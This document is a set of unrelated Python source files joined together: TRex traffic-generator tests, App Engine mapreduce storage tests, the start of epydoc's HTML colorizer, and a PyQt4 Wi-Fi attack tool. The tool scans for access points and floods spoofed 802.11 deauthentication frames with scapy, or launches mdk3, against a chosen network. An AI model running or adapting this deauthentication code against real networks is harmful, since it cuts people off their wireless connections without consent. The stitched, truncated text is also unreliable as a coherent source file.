self.verify(stats[self.tx_port]['opackets'], stats[self.rx_port]['ipackets'])
self.verify(stats[self.rx_port]['opackets'], stats[self.tx_port]['ipackets'])
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.set_port_attr(ports = [self.tx_port, self.rx_port], promiscuous = False)
# see https://trex-tgn.cisco.com/youtrack/issue/trex-226
def test_latency_pause_resume (self):
try:
s1 = STLStream(name = 'latency',
packet = self.pkt,
mode = STLTXCont(percentage = self.percentage),
flow_stats = STLFlowLatencyStats(pg_id = 1))
self.c.add_streams([s1], ports = self.tx_port)
self.c.clear_stats()
self.c.start(ports = self.tx_port)
for i in range(100):
self.c.pause()
self.c.resume()
self.c.stop()
except STLError as e:
assert False , '{0}'.format(e)
def test_pcap_remote (self):
try:
pcap_file = os.path.join(CTRexScenario.scripts_path, 'automation/regression/test_pcaps/pcap_dual_test.erf')
master = self.tx_port
slave = master ^ 0x1
self.c.reset(ports = [master, slave])
self.c.clear_stats()
self.c.push_remote(pcap_file,
ports = [master],
ipg_usec = 100,
is_dual = True)
self.c.wait_on_traffic(ports = [master])
stats = self.c.get_stats()
self.verify(52, stats[master]['opackets'])
self.verify(48, stats[slave]['opackets'])
except STLError as e:
assert False , '{0}'.format(e)
def test_tx_from_rx (self):
'''
test TX packets from the RX core
'''
tx_capture_id = None
rx_capture_id = None
# use explicit values for easy comparsion
tx_src_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['src']
tx_dst_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['dst']
try:
# add some background traffic (TCP)
s1 = STLStream(name = 'burst', packet = STLPktBuilder(Ether()/IP()/TCP()), mode = STLTXCont())
self.c.add_streams(ports = [self.tx_port, self.rx_port], streams = [s1])
self.c.start(ports = [self.tx_port, self.rx_port], mult = "5kpps")
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# VICs adds VLAN 0 on RX side
tx_capture_id = self.c.start_capture(tx_ports = self.tx_port, bpf_filter = 'udp')['id']
rx_capture_id = self.c.start_capture(rx_ports = self.rx_port, bpf_filter = 'udp or (vlan and udp)')['id']
pkts = [bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/UDP(sport = x,dport=1000)/('x' * 100)) for x in range(50000,50500)]
self.c.push_packets(pkts, ports = self.tx_port, ipg_usec = 1e6 / self.pps)
# check capture status with timeout
timeout = PassiveTimer(2)
while not timeout.has_expired():
caps = self.c.get_capture_status()
assert(len(caps) == 2)
if (caps[tx_capture_id]['count'] == len(pkts)) and (caps[rx_capture_id]['count'] == len(pkts)):
break
time.sleep(0.1)
assert(caps[tx_capture_id]['count'] == len(pkts))
self.verify(len(pkts), caps[rx_capture_id]['count'])
# TX capture
tx_pkts = []
self.c.stop_capture(tx_capture_id, output = tx_pkts)
tx_capture_id = None
# RX capture
rx_pkts = []
self.c.stop_capture(rx_capture_id, output = rx_pkts)
rx_capture_id = None
tx_pkts = [x['binary'] for x in tx_pkts]
rx_pkts = [x['binary'] for x in rx_pkts]
# TX pkts should be the same
assert(set(pkts) == set(tx_pkts))
# RX pkts are not the same - loose check, all here and are UDP
self.verify(len(pkts), len(rx_pkts))
assert (all(['UDP' in Ether(x) for x in rx_pkts]))
except STLError as e:
# cleanup if needed
if tx_capture_id:
self.c.stop_capture(tx_capture_id)
if rx_capture_id:
self.c.stop_capture(rx_capture_id)
assert False , '{0}'.format(e)
finally:
self.cleanup()
def test_bpf (self):
'''
test BPF filters
'''
tx_capture_id = None
rx_capture_id = None
# use explicit values for easy comparsion
tx_src_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['src']
tx_dst_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['dst']
try:
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# VICs adds VLAN 0 tagging
bpf_filter = "udp and src portrange 1-250"
bpf_filter = '{0} or (vlan and {1})'.format(bpf_filter, bpf_filter)
tx_capture_id = self.c.start_capture(tx_ports = self.tx_port, bpf_filter = bpf_filter)['id']
rx_capture_id = self.c.start_capture(rx_ports = self.rx_port, bpf_filter = bpf_filter)['id']
self.c.clear_stats(ports = self.tx_port)
# real
pkts = [bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/UDP(sport = x)/('x' * 100)) for x in range(500)]
self.c.push_packets(pkts, ports = self.tx_port, ipg_usec = 1e6 / self.pps)
# noise
pkts = [bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/TCP(sport = x)/('x' * 100)) for x in range(500)]
self.c.push_packets(pkts, ports = self.tx_port, ipg_usec = 1e6 / self.pps)
# check capture status with timeout
timeout = PassiveTimer(2)
while not timeout.has_expired():
opackets = self.c.get_stats(ports = self.tx_port)[self.tx_port]['opackets']
if (opackets >= 1000):
break
time.sleep(0.1)
# make sure
caps = self.c.get_capture_status()
assert(len(caps) == 2)
assert(caps[tx_capture_id]['count'] == 250)
assert(caps[rx_capture_id]['count'] == 250)
except STLError as e:
assert False , '{0}'.format(e)
finally:
# cleanup if needed
if tx_capture_id:
self.c.stop_capture(tx_capture_id)
if rx_capture_id:
self.c.stop_capture(rx_capture_id)
self.cleanup()
# tests core pinning with latency
def show_cpu_usage (self):
cpu_stats = [x['ports'] for x in self.c.get_util_stats()['cpu']]
print('')
for i, cpu in enumerate(cpu_stats):
cpu = [x for x in cpu if x != -1]
if cpu:
print('core {0}: {1}'.format(i, cpu))
print('')
def get_cpu_usage (self):
cpu_stats = [x['ports'] for x in self.c.get_util_stats()['cpu'] if x['ports'] != [-1, -1]]
return cpu_stats
def test_core_pinning (self):
if self.c.system_info.get('dp_core_count_per_port') < 2:
self.skip('pinning test requires at least 2 cores per interface')
s1 = STLStream(packet = self.pkt, mode = STLTXCont())
self.c.reset([0, 1])
try:
self.c.add_streams(ports = [0, 1], streams = s1)
# split mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_SPLIT)
time.sleep(0.1)
cpu_stats = self.get_cpu_usage()
# make sure all cores operate on both ports
assert all([stat == [0, 1] for stat in cpu_stats])
self.c.stop(ports = [0, 1])
# pin mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_PIN)
time.sleep(0.1)
cpu_stats = self.get_cpu_usage()
# make sure cores were splitted equally
if ( (len(cpu_stats) % 2) == 0):
assert cpu_stats.count([0, -1]) == cpu_stats.count([-1, 1])
else:
assert abs(cpu_stats.count([0, -1]) - cpu_stats.count([-1, 1])) == 1
self.c.stop(ports = [0, 1])
except STLError as e:
assert False , '{0}'.format(e)
# check pinning with latency
def test_core_pinning_latency (self):
if self.c.system_info.get('dp_core_count_per_port') < 2:
self.skip('pinning test requires at least 2 cores per interface')
s1 = STLStream(packet = self.pkt, mode = STLTXCont())
l1 = STLStream(packet = self.pkt, mode = STLTXCont(), flow_stats = STLFlowLatencyStats(pg_id = 3))
l2 = STLStream(packet = self.pkt, mode = STLTXCont(), flow_stats = STLFlowLatencyStats(pg_id = 4))
self.c.reset([0, 1])
try:
self.c.add_streams(ports = 0, streams = [s1, l1])
self.c.add_streams(ports = 1, streams = [s1, l2])
# split mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_SPLIT)
time.sleep(0.1)
cpu_stats = self.get_cpu_usage()
# make sure all cores operate on both ports
assert all([stat == [0, 1] for stat in cpu_stats])
self.c.stop(ports = [0, 1])
# pin mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_PIN)
time.sleep(0.1)
# for pin mode with latency core 0 should opreate on both
cpu_stats = self.get_cpu_usage()
# core 0 should be associated with both
core_0 = cpu_stats.pop(0)
assert (core_0 == [0, 1])
# make sure cores were splitted equally
if ( (len(cpu_stats) % 2) == 0):
assert cpu_stats.count([0, -1]) == cpu_stats.count([-1, 1])
else:
assert abs(cpu_stats.count([0, -1]) - cpu_stats.count([-1, 1])) == 1
self.c.stop(ports = [0, 1])
except STLError as e:
assert False , '{0}'.format(e)
|
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from subprocess import Popen,PIPE
from scapy.all import *
import threading
from os import popen,system,getuid,path,makedirs
from re import search,compile,match
from Core.Settings import frm_Settings
from Modules.utils import Refactor,ProcessThread,airdump_start,get_network_scan,set_monitor_mode
from multiprocessing import Process
from subprocess import Popen,PIPE,STDOUT,call,check_output
threadloading = {'deauth':[],'mdk3':[]}
class frm_window(QMainWindow):
def __init__(self, parent=None):
super(frm_window, self).__init__(parent)
self.form_widget = frm_deauth(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Deauth Attack wireless Route")
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def closeEvent(self, event):
global threadloading
if len(threadloading['deauth']) != 0 or len(threadloading['mdk3']) != 0:
reply = QMessageBox.question(self, 'About Exit',"Are you sure to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
for i in threadloading['deauth']:
i.terminate()
print("[*] Deuath Thread Terminate")
for i in threadloading['mdk3']:
i.stop(),i.join()
self.deleteLater()
else:
event.ignore()
class frm_deauth(QWidget):
def __init__(self, parent=None):
super(frm_deauth, self).__init__(parent)
self.Main = QVBoxLayout()
self.xmlcheck = frm_Settings()
self.interface = self.xmlcheck.xmlSettings("interface", "monitor_mode", None, False)
self.ApsCaptured = {}
self.pacote = []
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
self.window_qt()
def select_target(self):
item = self.tables.selectedItems()
if item != []:
self.linetarget.setText(item[2].text())
else:
QMessageBox.critical(self, "Error in row", "Nothing row in tables, please try scan network again")
self.linetarget.clear()
def window_qt(self):
self.mForm = QFormLayout()
self.statusbar = QStatusBar()
system = QLabel("Deauthentication::")
self.statusbar.addWidget(system)
self.Controlador = QLabel("")
self.AttackStatus(False)
self.tables = QTableWidget(5,3)
self.tables.setFixedWidth(350)
self.tables.setRowCount(100)
self.tables.setFixedHeight(250)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.select_target)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,60)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.linetarget = QLineEdit(self)
self.input_client = QLineEdit(self)
self.input_client.setText("FF:FF:FF:FF:FF:FF")
self.btn_enviar = QPushButton("Send Attack", self)
self.btn_enviar.clicked.connect(self.attack_deauth)
self.btn_scan = QPushButton(" Network Scan ", self)
self.btn_scan.clicked.connect(self.SettingsScan)
self.btn_stop = QPushButton("Stop Attack ", self)
self.btn_stop.clicked.connect(self.kill_thread)
self.btn_enviar.setFixedWidth(170)
self.btn_stop.setFixedWidth(170)
self.btn_scan.setFixedWidth(120)
#icons
self.btn_scan.setIcon(QIcon("rsc/network.png"))
self.btn_enviar.setIcon(QIcon("rsc/start.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.time_scan = QComboBox(self)
self.time_scan.addItem("10s")
self.time_scan.addItem("20s")
self.time_scan.addItem("30s")
self.get_placa = QComboBox(self)
n = Refactor.get_interfaces()['all']
for i,j in enumerate(n):
if search("wlan", j):
self.get_placa.addItem(n[i])
#grid options
self.Grid = QGridLayout()
self.options_scan = self.xmlcheck.xmlSettings("scanner_AP", "select", None, False)
if self.options_scan != "scan_scapy":self.time_scan.setEnabled(False)
self.Grid.addWidget(QLabel("Time:"),0,0)
self.Grid.addWidget(self.time_scan,0,1)
self.Grid.addWidget(self.get_placa,0,2)
self.Grid.addWidget(self.btn_scan,0,3)
self.Grid.addWidget(self.btn_scan,0,3)
self.Grid.addWidget(QLabel("bssid:"),1,0)
self.Grid.addWidget(QLabel(" Client:"),1,2)
self.Grid.addWidget(self.linetarget,1,1)
self.Grid.addWidget(self.input_client,1,3)
self.form0 = QGridLayout()
self.form0.addWidget(self.tables,0,0)
self.mForm.addRow(self.btn_enviar, self.btn_stop)
self.mForm.addRow(self.statusbar)
self.Main.addLayout(self.form0)
self.Main.addLayout(self.Grid)
self.Main.addLayout(self.mForm)
self.setLayout(self.Main)
def scan_diveces_airodump(self):
dirpath = "Settings/Dump"
if not path.isdir(dirpath):
makedirs(dirpath)
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
exit_air = airdump_start(self.interface)
self.fix = False
if exit_air == None:
self.cap = get_network_scan()
if self.cap != None:
for i in self.cap:
i = i.split("||")
if Refactor.check_is_mac(i[2]):
Headers = []
self.data['Channel'].append(i[0])
self.data['Essid'].append(i[1])
self.data['Bssid'].append(i[2])
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
self.cap =[]
def kill_thread(self):
global threadloading
for i in threadloading['deauth']:
i.terminate()
for i in threadloading['mdk3']:
i.stop(),i.join()
self.AttackStatus(False)
print("[*] deauth Attack OFF")
def SettingsScan(self):
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
if self.get_placa.currentText() == "":
QMessageBox.information(self, "Network Adapter", 'Network Adapter Not found try again.')
else:
self.interface = str(set_monitor_mode(self.get_placa.currentText()).setEnable())
self.xmlcheck.xmlSettings("interface", "monitor_mode", self.interface, False)
if self.time_scan.currentText() == "10s":count = 10
elif self.time_scan.currentText() == "20s":count = 20
elif self.time_scan.currentText() == "30s":count = 30
if self.interface != None:
if self.options_scan == "scan_scapy":
self.scapy_scan_AP(self.interface,count)
for i in self.ApsCaptured.keys():
if Refactor.check_is_mac(i):
self.data['Channel'].append(self.ApsCaptured[i][0])
self.data['Essid'].append(self.ApsCaptured[i][1])
self.data['Bssid'].append(i)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
else:
if path.isfile(popen('which airodump-ng').read().split("\n")[0]):
self.thread_airodump = threading.Thread(target=self.scan_diveces_airodump)
self.thread_airodump.daemon = True
self.thread_airodump.start()
else:
QMessageBox.information(self,'Error airodump','airodump-ng not installed')
set_monitor_mode(self.get_placa.currentText()).setDisable()
def scapy_scan_AP(self,interface,timeout):
sniff(iface=str(interface), prn =self.Scanner_devices, timeout=timeout)
def Scanner_devices(self,pkt):
if pkt.type == 0 and pkt.subtype == 8:
self.ApsCaptured[pkt.addr2] = [str(int(ord(pkt[Dot11Elt:3].info))),pkt.info]
def attack_deauth(self):
global threadloading
if self.linetarget.text() == "":
QMessageBox.information(self, "Target Error", "Please, first select Target for attack")
else:
self.bssid = str(self.linetarget.text())
self.deauth_check = self.xmlcheck.xmlSettings("deauth", "select",None,False)
self.args = str(self.xmlcheck.xmlSettings("mdk3","arguments", None, False))
if self.deauth_check == "packets_scapy":
self.AttackStatus(True)
t = Process(target=self.deauth_attacker, args=(self.bssid,str(self.input_client.text())))
print("[*] deauth Attack On:"+self.bssid)
threadloading['deauth'].append(t)
t.daemon = True
t.start()
else:
if path.isfile(popen('which mdk3').read().split("\n")[0]):
self.AttackStatus(True)
t = ProcessThread(("mdk3 %s %s %s"%(self.interface,self.args,self.bssid)).split())
t.name = "mdk3"
threadloading['mdk3'].append(t)
t.start()
else:
QMessageBox.information(self,'Error mdk3','mkd3 not installed')
set_monitor_mode(self.get_placa.currentText()).setDisable()
def AttackStatus(self,bool):
if bool:
self.Controlador.setText("[ON]")
self.Controlador.setStyleSheet("QLabel { color : green; }")
else:
self.Controlador.setText("[OFF]")
self.Controlador.setStyleSheet("QLabel { color : red; }")
self.statusbar.addWidget(self.Controlador)
def deauth_attacker(self,bssid, client):
conf.verb = 0
conf.iface = self.interface
pkts = []
pkt1 = RadioTap()/Dot11(type=0,
subtype=12,addr1=client,
addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
pkt2 = Dot11(addr1=bssid, addr2=client,
addr3=client)/Dot11Deauth()
pkts.append(pkt1)
pkts.append(pkt2)
while True:
for i in pkts:
sendp(i,verbose=False,count=1)
@pyqtSlot(QModelIndex)
def list_clicked(self, index):
itms = self.list.selectedIndexes()
for i in itms:
attack = str(i.data().toString()).split()
for i in attack:
if Refactor.check_is_mac(i.replace(" ", "")):
self.linetarget.setText(str(i))
if self.linetarget.text() == "":
QMessageBox.information(self, "MacAddress",
"Error check the Mac Target, please set the mac valid.")
|
|
#!/usr/bin/env python
#
# Copyright 2011 Google Inc. All Rights Reserved.
# Using opensource naming conventions, pylint: disable=g-bad-name
import unittest
from google.appengine.ext import db
from mapreduce import control
from mapreduce import input_readers
from mapreduce import model
from mapreduce import output_writers
from mapreduce import records
from mapreduce import test_support
from testlib import testutil
# pylint: disable=g-import-not-at-top
# TODO(user): Cleanup imports if/when cloudstorage becomes part of runtime.
try:
import cloudstorage
enable_cloudstorage_tests = True
except ImportError:
enable_cloudstorage_tests = False
DATASTORE_READER_NAME = (input_readers.__name__ + "." +
input_readers.DatastoreInputReader.__name__)
class TestEntity(db.Model):
"""Test entity class."""
def test_handler_yield_key_str(entity):
"""Test handler which yields entity key."""
yield str(entity.key()) + "\n"
class GoogleCloudStorageOutputWriterEndToEndTest(testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageOutputWriter."""
WRITER_CLS = output_writers._GoogleCloudStorageOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
def _runTest(self, num_shards):
entity_count = 1000
bucket_name = "bucket"
job_name = "test_map"
for _ in range(entity_count):
TestEntity().put()
mapreduce_id = control.start_map(
job_name,
__name__ + ".test_handler_yield_key_str",
DATASTORE_READER_NAME,
{
"entity_kind": __name__ + "." + TestEntity.__name__,
"output_writer": {
"bucket_name": bucket_name,
},
},
shard_count=num_shards,
output_writer_spec=self.WRITER_NAME)
test_support.execute_until_empty(self.taskqueue)
mapreduce_state = model.MapreduceState.get_by_job_id(mapreduce_id)
filenames = self.WRITER_CLS.get_filenames(mapreduce_state)
self.assertEqual(num_shards, len(set(filenames)))
total_entries = 0
for shard in range(num_shards):
self.assertTrue(filenames[shard].startswith("/%s/%s" % (bucket_name,
job_name)))
data = cloudstorage.open(filenames[shard]).read()
# strip() is used to remove the last newline of each file so that split()
# does not retrun extraneous empty entries.
total_entries += len(data.strip().split("\n"))
self.assertEqual(entity_count, total_entries)
def testSingleShard(self):
self._runTest(num_shards=1)
def testMultipleShards(self):
self._runTest(num_shards=4)
class GCSRecordOutputWriterEndToEndTestBase(object):
WRITER_CLS = output_writers._GoogleCloudStorageRecordOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
def _runTest(self, num_shards):
entity_count = 1000
bucket_name = "bucket"
job_name = "test_map"
for _ in range(entity_count):
TestEntity().put()
mapreduce_id = control.start_map(
job_name,
__name__ + ".test_handler_yield_key_str",
DATASTORE_READER_NAME,
{
"entity_kind": __name__ + "." + TestEntity.__name__,
"output_writer": {
"bucket_name": bucket_name,
},
},
shard_count=num_shards,
output_writer_spec=self.WRITER_NAME)
test_support.execute_until_empty(self.taskqueue)
mapreduce_state = model.MapreduceState.get_by_job_id(mapreduce_id)
filenames = self.WRITER_CLS.get_filenames(mapreduce_state)
self.assertEqual(num_shards, len(set(filenames)))
total_entries = 0
for shard in range(num_shards):
self.assertTrue(filenames[shard].startswith("/%s/%s" % (bucket_name,
job_name)))
data = "".join([_ for _ in records.RecordsReader(
cloudstorage.open(filenames[shard]))])
# strip() is used to remove the last newline of each file so that split()
# does not return extraneous empty entries.
total_entries += len(data.strip().split("\n"))
self.assertEqual(entity_count, total_entries)
def testSingleShard(self):
self._runTest(num_shards=1)
def testMultipleShards(self):
self._runTest(num_shards=4)
class GoogleCloudStorageRecordOutputWriterEndToEndTest(
GCSRecordOutputWriterEndToEndTestBase,
testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageRecordOutputWriter."""
WRITER_CLS = output_writers._GoogleCloudStorageRecordOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
class GoogleCloudStorageConsistentRecordOutputWriterEndToEndTest(
GCSRecordOutputWriterEndToEndTestBase,
testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageConsistentRecordOutputWriter."""
WRITER_CLS = output_writers.GoogleCloudStorageConsistentRecordOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
class GoogleCloudStorageConsistentOutputWriterEndToEndTest(
testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageOutputWriter."""
WRITER_CLS = output_writers.GoogleCloudStorageConsistentOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
def _runTest(self, num_shards):
entity_count = 1000
bucket_name = "bucket"
tmp_bucket_name = "tmp_bucket"
job_name = "test_map"
for _ in range(entity_count):
TestEntity().put()
mapreduce_id = control.start_map(
job_name,
__name__ + ".test_handler_yield_key_str",
DATASTORE_READER_NAME,
{
"entity_kind": __name__ + "." + TestEntity.__name__,
"output_writer": {
"bucket_name": bucket_name,
"tmp_bucket_name": tmp_bucket_name,
},
},
shard_count=num_shards,
output_writer_spec=self.WRITER_NAME)
test_support.execute_until_empty(self.taskqueue)
mapreduce_state = model.MapreduceState.get_by_job_id(mapreduce_id)
filenames = self.WRITER_CLS.get_filenames(mapreduce_state)
self.assertEqual(num_shards, len(set(filenames)))
total_entries = 0
for shard in range(num_shards):
self.assertTrue(filenames[shard].startswith("/%s/%s" % (bucket_name,
job_name)))
data = cloudstorage.open(filenames[shard]).read()
# strip() is used to remove the last newline of each file so that split()
# does not retrun extraneous empty entries.
total_entries += len(data.strip().split("\n"))
self.assertEqual(entity_count, total_entries)
# no files left in tmpbucket
self.assertFalse(list(cloudstorage.listbucket("/%s" % tmp_bucket_name)))
# and only expected files in regular bucket
files_in_bucket = [
f.filename for f in cloudstorage.listbucket("/%s" % bucket_name)]
self.assertEquals(filenames, files_in_bucket)
def testSingleShard(self):
self._runTest(num_shards=1)
def testMultipleShards(self):
self._runTest(num_shards=4)
if __name__ == "__main__":
unittest.main()
|
|
#
# epydoc.html: HTML colorizers
# Edward Loper
#
# Created [10/16/02 09:49 PM]
# $Id: html_colorize.py 1477 2007-02-13 20:27:31Z edloper $
#
"""
Functions to produce colorized HTML code for various objects.
Currently, C{html_colorize} defines functions to colorize
Python source code.
"""
__docformat__ = 'epytext en'
import re, codecs
from epydoc import log
from epydoc.util import py_src_filename
from epydoc.apidoc import *
import tokenize, token, cgi, keyword
try: from cStringIO import StringIO
except: from StringIO import StringIO
######################################################################
## Python source colorizer
######################################################################
"""
Goals:
- colorize tokens appropriately (using css)
- optionally add line numbers
-
"""
#: Javascript code for the PythonSourceColorizer
PYSRC_JAVASCRIPTS = '''\
function expand(id) {
var elt = document.getElementById(id+"-expanded");
if (elt) elt.style.display = "block";
var elt = document.getElementById(id+"-expanded-linenums");
if (elt) elt.style.display = "block";
var elt = document.getElementById(id+"-collapsed");
if (elt) { elt.innerHTML = ""; elt.style.display = "none"; }
var elt = document.getElementById(id+"-collapsed-linenums");
if (elt) { elt.innerHTML = ""; elt.style.display = "none"; }
var elt = document.getElementById(id+"-toggle");
if (elt) { elt.innerHTML = "-"; }
}
function collapse(id) {
var elt = document.getElementById(id+"-expanded");
if (elt) elt.style.display = "none";
var elt = document.getElementById(id+"-expanded-linenums");
if (elt) elt.style.display = "none";
var elt = document.getElementById(id+"-collapsed-linenums");
if (elt) { elt.innerHTML = "<br/>"; elt.style.display="block"; }
var elt = document.getElementById(id+"-toggle");
if (elt) { elt.innerHTML = "+"; }
var elt = document.getElementById(id+"-collapsed");
if (elt) {
elt.style.display = "block";
var indent = elt.getAttribute("indent");
var pad = elt.getAttribute("pad");
var s = "<tt class=\'py-lineno\'>";
for (var i=0; i<pad.length; i++) { s += " " }
s += "</tt>";
s += " <tt class=\'py-line\'>";
for (var i=0; i<indent.length; i++) { s += " " }
s += "<a href=\'#\' onclick=\'expand(\\"" + id;
s += "\\");return false\'>...</a></tt><br />";
elt.innerHTML = s;
}
}
function toggle(id) {
elt = document.getElementById(id+"-toggle");
if (elt.innerHTML == "-")
collapse(id);
else
expand(id);
return false;
}
function highlight(id) {
var elt = document.getElementById(id+"-def");
if (elt) elt.className = "py-highlight-hdr";
var elt = document.getElementById(id+"-expanded");
if (elt) elt.className = "py-highlight";
var elt = document.getElementById(id+"-collapsed");
if (elt) elt.className = "py-highlight";
}
function num_lines(s) {
var n = 1;
var pos = s.indexOf("\\n");
while ( pos > 0) {
n += 1;
pos = s.indexOf("\\n", pos+1);
}
return n;
}
// Collapse all blocks that mave more than `min_lines` lines.
function collapse_all(min_lines) {
var elts = document.getElementsByTagName("div");
for (var i=0; i<elts.length; i++) {
var elt = elts[i];
var split = elt.id.indexOf("-");
if (split > 0)
if (elt.id.substring(split, elt.id.length) == "-expanded")
if (num_lines(elt.innerHTML) > min_lines)
collapse(elt.id.substring(0, split));
}
}
function expandto(href) {
var start = href.indexOf("#")+1;
if (start != 0 && start != href.length) {
if (href.substring(start, href.length) != "-") {
collapse_all(4);
pos = href.indexOf(".", start);
while (pos != -1) {
var id = href.substring(start, pos);
expand(id);
pos = href.indexOf(".", pos+1);
}
var id = href.substring(start, href.length);
expand(id);
highlight(id);
}
}
}
function kill_doclink(id) {
var parent = document.getElementById(id);
parent.removeChild(parent.childNodes.item(0));
}
function auto_kill_doclink(ev) {
if (!ev) var ev = window.event;
if (!this.contains(ev.toElement)) {
var parent = document.getElementById(this.parentID);
parent.removeChild(parent.childNodes.item(0));
}
}
function doclink(id, name, targets_id) {
var elt = document.getElementById(id);
// If we already opened the box, then destroy it.
// (This case should never occur, but leave it in just in case.)
if (elt.childNodes.length > 1) {
elt.removeChild(elt.childNodes.item(0));
}
else {
// The outer box: relative + inline positioning.
var box1 = document.createElement("div");
box1.style.position = "relative";
box1.style.display = "inline";
box1.style.top = 0;
box1.style.left = 0;
// A shadow for fun
var shadow = document.createElement("div");
shadow.style.position = "absolute";
shadow.style.left = "-1.3em";
shadow.style.top = "-1.3em";
shadow.style.background = "#404040";
// The inner box: absolute positioning.
var box2 = document.createElement("div");
box2.style.position = "relative";
box2.style.border = "1px solid #a0a0a0";
box2.style.left = "-.2em";
box2.style.top = "-.2em";
box2.style.background = "white";
box2.style.padding = ".3em .4em .3em .4em";
box2.style.fontStyle = "normal";
box2.onmouseout=auto_kill_doclink;
box2.parentID = id;
// Get the targets
var targets_elt = document.getElementById(targets_id);
var targets = targets_elt.getAttribute("targets");
var links = "";
target_list = targets.split(",");
for (var i=0; i<target_list.length; i++) {
var target = target_list[i].split("=");
links += "<li><a href=\'" + target[1] +
"\' style=\'text-decoration:none\'>" +
target[0] + "</a></li>";
}
// Put it all together.
elt.insertBefore(box1, elt.childNodes.item(0));
//box1.appendChild(box2);
box1.appendChild(shadow);
shadow.appendChild(box2);
box2.innerHTML =
"Which <b>"+name+"</b> do you want to see documentation for?" +
"<ul style=\'margin-bottom: 0;\'>" +
links +
"<li><a href=\'#\' style=\'text-decoration:none\' " +
"onclick=\'kill_doclink(\\""+id+"\\");return false;\'>"+
"<i>None of the above</i></a></li></ul>";
}
return false;
}
'''
PYSRC_EXPANDTO_JAVASCRIPT = '''\
<script type="text/javascript">
<!--
expandto(location.href);
// -->
</script>
'''
class PythonSourceColorizer:
"""
A class that renders a python module's source code into HTML
pages. These HTML pages are intended to be provided along with
the API documentation for a module, in case a user wants to learn
more about a particular object by examining its source code.
Links are therefore generated from the API documentation to the
source code pages, and from the source code pages back into the
API documentation.
The HTML generated by C{PythonSourceColorizer} has several notable
features:
- CSS styles are used to color tokens according to their type.
(See L{CSS_CLASSES} for a list of the different token types
that are identified).
- Line numbers are included to the left of each line.
- The first line of each class and function definition includes
a link to the API source documentation for that object.
- The first line of each class and function definition includes
an anchor that can be used to link directly to that class or
function.
- If javascript is enabled, and the page is loaded using the
anchor for a class or function (i.e., if the url ends in
C{'#I{<name>}'}), then that class or function will automatically
be highlighted; and all other classes and function definition
blocks will be 'collapsed'. These collapsed blocks can be
expanded by clicking on them.
- Unicode input is supported (including automatic detection
of C{'coding:'} declarations).
"""
#: A look-up table that is used to determine which CSS class
